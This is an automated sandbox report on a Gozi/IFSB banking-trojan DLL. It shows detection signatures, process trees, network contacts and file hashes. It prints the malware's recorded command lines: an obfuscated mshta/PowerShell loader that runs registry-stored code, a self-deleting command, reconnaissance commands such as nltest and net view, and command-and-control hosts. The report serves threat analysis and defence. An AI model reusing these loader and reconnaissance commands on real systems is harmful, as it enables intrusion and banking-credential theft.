Malware Analysis Report

2025-08-06 04:26

Sample ID 220124-l6sx2sebc2
Target 61ee6edf7de65.dll
SHA256 06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
Tags
gozi_ifsb 20000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf

Threat Level: Known bad

The file 61ee6edf7de65.dll was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 20000 banker trojan

Gozi, Gozi IFSB

Blocklisted process makes network request

Deletes itself

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Enumerates processes with tasklist

Suspicious behavior: GetForegroundWindowSpam

Gathers system information

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Runs ping.exe

Discovers systems in the same network

Modifies Internet Explorer settings

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-24 10:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-24 10:09

Reported

2022-01-24 10:11

Platform

win7-en-20211208

Max time kernel

143s

Max time network

122s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1048 set thread context of 1284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1284 set thread context of 1592 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1592 set thread context of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1284 set thread context of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1900 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1176 wrote to memory of 1048 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 1048 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 1048 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1048 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1048 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1028 wrote to memory of 1888 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1028 wrote to memory of 1888 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1028 wrote to memory of 1888 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1048 wrote to memory of 752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1048 wrote to memory of 752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1048 wrote to memory of 752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 752 wrote to memory of 264 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 752 wrote to memory of 264 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 752 wrote to memory of 264 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1048 wrote to memory of 1284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1048 wrote to memory of 1284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1048 wrote to memory of 1284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1284 wrote to memory of 1592 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1284 wrote to memory of 1592 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1284 wrote to memory of 1592 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1284 wrote to memory of 1592 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1284 wrote to memory of 1592 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1284 wrote to memory of 1592 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1592 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1592 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1592 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1592 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1592 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1592 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1284 wrote to memory of 1612 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1612 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1612 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1612 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1612 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1612 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1284 wrote to memory of 1020 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1020 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1020 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 748 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 748 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 748 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 748 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 748 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 748 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1284 wrote to memory of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1284 wrote to memory of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1284 wrote to memory of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1284 wrote to memory of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1284 wrote to memory of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1284 wrote to memory of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1284 wrote to memory of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1284 wrote to memory of 1800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 980 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 980 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shva='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shva).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\A97B9ACF-F490-C387-46ED-68A7DA711CCB\\\StartDevice'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name micdnux -value gp; new-alias -name wsfkguhx -value iex; wsfkguhx ([System.Text.Encoding]::ASCII.GetString((micdnux "HKCU:Software\AppDataLow\Software\Microsoft\A97B9ACF-F490-C387-46ED-68A7DA711CCB").OptionsAbout))

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ffdjt0df.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES52D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC52C2.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7cp2lteu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES535F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC535E.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B840.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B840.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\4868.bin1 > C:\Users\Admin\AppData\Local\Temp\4868.bin & del C:\Users\Admin\AppData\Local\Temp\4868.bin1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 giporedtrip.at udp
ER 196.200.111.5:80 giporedtrip.at tcp
ER 196.200.111.5:80 giporedtrip.at tcp
ER 196.200.111.5:80 giporedtrip.at tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
RU 45.9.20.190:80 45.9.20.190 tcp
ER 196.200.111.5:80 giporedtrip.at tcp
ER 196.200.111.5:80 giporedtrip.at tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
ER 196.200.111.5:80 giporedtrip.at tcp
ER 196.200.111.5:80 giporedtrip.at tcp
ER 196.200.111.5:80 giporedtrip.at tcp

Files

memory/2040-55-0x00000000760F1000-0x00000000760F3000-memory.dmp

memory/2040-56-0x0000000002020000-0x0000000002030000-memory.dmp

memory/2040-57-0x0000000075040000-0x000000007505C000-memory.dmp

memory/2040-58-0x00000000001A0000-0x00000000001A2000-memory.dmp

memory/1176-59-0x000007FEFBF81000-0x000007FEFBF83000-memory.dmp

memory/1048-61-0x000007FEEE460000-0x000007FEEEFBD000-memory.dmp

memory/1048-62-0x00000000028F0000-0x00000000028F2000-memory.dmp

memory/1048-63-0x00000000028F2000-0x00000000028F4000-memory.dmp

memory/1048-64-0x00000000028F4000-0x00000000028F7000-memory.dmp

memory/1048-65-0x00000000028FB000-0x000000000291A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ffdjt0df.cmdline

MD5 5fb81d5401d1666bb2ebdce46de74bb2
SHA1 f425ee95e21bd2af026181537e0bf415bca043e8
SHA256 9e91fc6feeb6c697c56fec6c2124ff7b86ec276656ca08d627fa4897766e8846
SHA512 3309b0e479217b4d50a85f079d93df35262d3f4e72aea4e5c5f2f444d615505723ed08509bb321b5788f5594909be5dee37202430d8d79b8c5c5bdafd7ee72c6

\??\c:\Users\Admin\AppData\Local\Temp\ffdjt0df.0.cs

MD5 04ca9f3dd2f71bc69a66232592bd29b7
SHA1 12724cb97fe30a8b84901648b3653b9ac8fb2f73
SHA256 dbc22ffc06ebcb8f7e00bb962ca175effbbdf0debe7a2e4d288a8735c5c27db1
SHA512 383c82a91a354a95e9887e9731852788f466c461ea58a016532e4b07a3e19a97c525b4b579b86a4681bf3dbacfa6b65c8f11032b904737c287a6a5498e4eeb4e

\??\c:\Users\Admin\AppData\Local\Temp\CSC52C2.tmp

MD5 8e2cf73dd9bc2e7b03e5d4f69d25726f
SHA1 7ce37a0f4c7a43fb570cbc822dcffc9b1b8507ce
SHA256 4d1064903279344bbf1caafff5de2c5f14230c5b4e077fa036660f03f153c06d
SHA512 a036fafd6876a7211328cce2e23a610decfb40221a3d204a60c8d78e4c811ffaba8173983be66d0834798381e0280adeb9c00be18bb890172269c4293fcd5c67

C:\Users\Admin\AppData\Local\Temp\RES52D2.tmp

MD5 e4fdd2b90b86f05cb65f8a548880b4fe
SHA1 27faec1dbad280ff3343a45666dd89f2a8cd7011
SHA256 a5dd0abe45802e37c75d3c443aa5ac34a0a9ffb4dcf71d766cb8941f67825b54
SHA512 88a968468cd8bb53f3a0bcb361a3fbd9b2aded7c1eb60305123d5bc3c7754512e89c845c8cf292d1568b824280263d17a943cdb3e24926404796dccedc0d1de2

C:\Users\Admin\AppData\Local\Temp\ffdjt0df.dll

MD5 b1f73199330ad52851600286ff7e06df
SHA1 f6020c4ebc4e6ab5cf1143c7697f1a167fc168ed
SHA256 fd49fb763cd68c7553d45c00fa296910b31fcb9c3ea960c5e0ccc7bd20b67bce
SHA512 3c84b350ef909aa5b0900e5257cd2221dc27565fa9eea4c1a9a79eead1ee5d528a2a0c2adbf32380b00535f5dfca910fbaeb1a9ca66354825881a8e6c727efcc

C:\Users\Admin\AppData\Local\Temp\ffdjt0df.pdb

MD5 25587e8024f16e00f8f1571f01c7300b
SHA1 7e139c9c3a2cb2899ab100eb6e448b5e9d5fa6d0
SHA256 0d4ce3d4865c6f740003779ed099b72fc429e4bd710db964137fe3a569e86dd5
SHA512 bfbc07b6cda4c806c0fa933b2d032718ebc24c0e26d687964f22c0c756e3c45818a192b30edd47e530dc9555162fbb3217ec46054253a99c4d0a9b8abb529f93

\??\c:\Users\Admin\AppData\Local\Temp\7cp2lteu.cmdline

MD5 7926d12420a1e669b5215e15c7f8667d
SHA1 0fca4bb80921f29c0d12a643122bad3efa65c736
SHA256 ac7611bb61bf5f48cfc9d4fcf291361a1923412994c67ddfd018952a2b8c7e08
SHA512 a1928982372adacebd021921b5b3ce94c6146f991dcbf1946cc3ed9ac8014612014a46aa5a120a495c806e59b013031595e874e35f0c138e8f7d6406319b606f

\??\c:\Users\Admin\AppData\Local\Temp\7cp2lteu.0.cs

MD5 35eab9a45b1cc09a0099a179ad3dcfe5
SHA1 42939ac7047bc372300fdd21624100e5c9f83b7f
SHA256 eeeecb79a83f234a098d4e685f9649e562ee2c5180da03ce782df3f95d7eb5a7
SHA512 03db096cd43e298a526507be3252f718516e26ecb50400d052b9c26e76eb89f950770696f2034fd9031e3421ee5f7e225d985bfd92cc51338ec19854c85017c1

\??\c:\Users\Admin\AppData\Local\Temp\CSC535E.tmp

MD5 47a585acdf2e3ec7f65178d7e9863e4d
SHA1 d7d7ec9789b1ff3d3ff91106afea8f7a126932e4
SHA256 333e2bc83bedd03b460d494dfd6e4454df01b9d2d61991eae6db2ef66c1f070d
SHA512 68d58a63f14550fc09efe209a44e15c3d6cf9d8c7328188301ff50eaec67f6b65c9655c74648888c12bf6c4179e817388f267e20e330f4a9f9cf344b86eeb4ee

C:\Users\Admin\AppData\Local\Temp\RES535F.tmp

MD5 54da03f77aea4a11b51e48e5490f69b9
SHA1 ed0a5f370d1dd80afc0305aecef3d6de6fdfb452
SHA256 b59c45420ef620c82330e5c6400eddba98180554c144cfb85df738832f80d727
SHA512 4295bda8d1b62c191fc54b41a04b6409ef74b8e89f480944767dd463bd21204acc499ad31a33cd8fdea5faa3fb6588d565fc28333d22c22d6ea6c16b4cb976c2

C:\Users\Admin\AppData\Local\Temp\7cp2lteu.pdb

MD5 a3327dbbc778ac795e0e07a9424813f3
SHA1 4cdc64e4a0bdfcb954dbf0b03201c242e340030f
SHA256 688466a4acafe7ff32bcd803927dcf5545417e080f1e4a9a898d9635eb52e64c
SHA512 25a826832321ea934e770078c432e9ae91c12aa8f826034ecc58b7d1cd5ef4f4fcb9e36be98d6789a1d6663f3333ecb8b11f1c5e390ebd970957a5e4cdc7a857

C:\Users\Admin\AppData\Local\Temp\7cp2lteu.dll

MD5 aa1ea0a670bc180dba35e1dbd3242b8c
SHA1 3869492daab2a9c359b775428305f61ca24a50a1
SHA256 cce8d0d2e9b4249ea7751f59317124da64afe04e4e39728ee93e44e84f4ea0e0
SHA512 a3ddbfebe03f58cbbe421935f7a7603488129caa76f32a96729c1bfccbb81267c1d3e439cb34fce73e2e1c1454b7342318adf6b5ed4893efbb3941b00adf4afc

memory/1048-78-0x000000001B630000-0x000000001B674000-memory.dmp

memory/1284-79-0x0000000002A50000-0x0000000002A51000-memory.dmp

memory/1592-81-0x0000000000310000-0x0000000000311000-memory.dmp

memory/1284-80-0x0000000006B30000-0x0000000006BE8000-memory.dmp

memory/1592-82-0x0000000001B70000-0x0000000001C28000-memory.dmp

memory/916-84-0x0000000001B40000-0x0000000001BF8000-memory.dmp

memory/916-83-0x0000000000180000-0x0000000000181000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B840.bi1

MD5 41a49d1a2a3a8713a12ccf89932d4bb7
SHA1 b324e8bbcd4ca71a35d0c00ac63c0255e8ec4287
SHA256 f210a8e30967b13dabe340c45ce4a97e9c94ad74975728eccdd0a27edf29b5fe
SHA512 1fc256f2068eb9ac32c04bad119e94ba006808fd2be48db397eecf69acd6d8972334f81f8439d6e153a9cb99db618a613f3b0adf2b5784c264b61d4d5c0669b1

C:\Users\Admin\AppData\Local\Temp\B840.bi1

MD5 41a49d1a2a3a8713a12ccf89932d4bb7
SHA1 b324e8bbcd4ca71a35d0c00ac63c0255e8ec4287
SHA256 f210a8e30967b13dabe340c45ce4a97e9c94ad74975728eccdd0a27edf29b5fe
SHA512 1fc256f2068eb9ac32c04bad119e94ba006808fd2be48db397eecf69acd6d8972334f81f8439d6e153a9cb99db618a613f3b0adf2b5784c264b61d4d5c0669b1

memory/1832-87-0x0000000001C70000-0x0000000001D1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 8b62d5615c7b1ed8d77b89bb66afc7e4
SHA1 e347adc78d36c0cd75398bdac863a019dddba639
SHA256 97899c71ce76baa636d353a51e84cbddca49ee556520ee23e694c4566f2807ba
SHA512 2c45d2c4ee5accc53ce132475840c9b61cc5d0cdb595ae1c98200e9b5b19542c32852945da34cec132a122e5b384391808dc312036b47309a5af435d04c105fd

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 8b62d5615c7b1ed8d77b89bb66afc7e4
SHA1 e347adc78d36c0cd75398bdac863a019dddba639
SHA256 97899c71ce76baa636d353a51e84cbddca49ee556520ee23e694c4566f2807ba
SHA512 2c45d2c4ee5accc53ce132475840c9b61cc5d0cdb595ae1c98200e9b5b19542c32852945da34cec132a122e5b384391808dc312036b47309a5af435d04c105fd

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 249139e3b796a2485c3a796f7ae32a7d
SHA1 5417ace92e2736d1c758f863d42a6e311602ef93
SHA256 bed15feca86de0bab3ff1bd44cec886797fa3ff93d9b90884dda01ce27cad2bb
SHA512 821107dc173688e96726590538eae322dc14389d718a33f6935845eda986e2962ee0c3cccfb6e708faf1339ef17db9cf6493017249b12bc3bbae718369066899

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 249139e3b796a2485c3a796f7ae32a7d
SHA1 5417ace92e2736d1c758f863d42a6e311602ef93
SHA256 bed15feca86de0bab3ff1bd44cec886797fa3ff93d9b90884dda01ce27cad2bb
SHA512 821107dc173688e96726590538eae322dc14389d718a33f6935845eda986e2962ee0c3cccfb6e708faf1339ef17db9cf6493017249b12bc3bbae718369066899

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 2d689ad6fef531e6d1dfe4e187c1f8f6
SHA1 8180b175fb9c6582ea68a08ba4328634f80a643a
SHA256 c58bfeebfdbdf4c65a4d89c6ef52e60c2a6d423a647adc334833684942196e62
SHA512 4b500b21477cdde8245f467ac91dce90ff1c33a24a55d0b668636b7df23adddc0d1f1d9683ad4e10e77feb8c33ed5191669a29c4d531e732c3e0afa15b943dbb

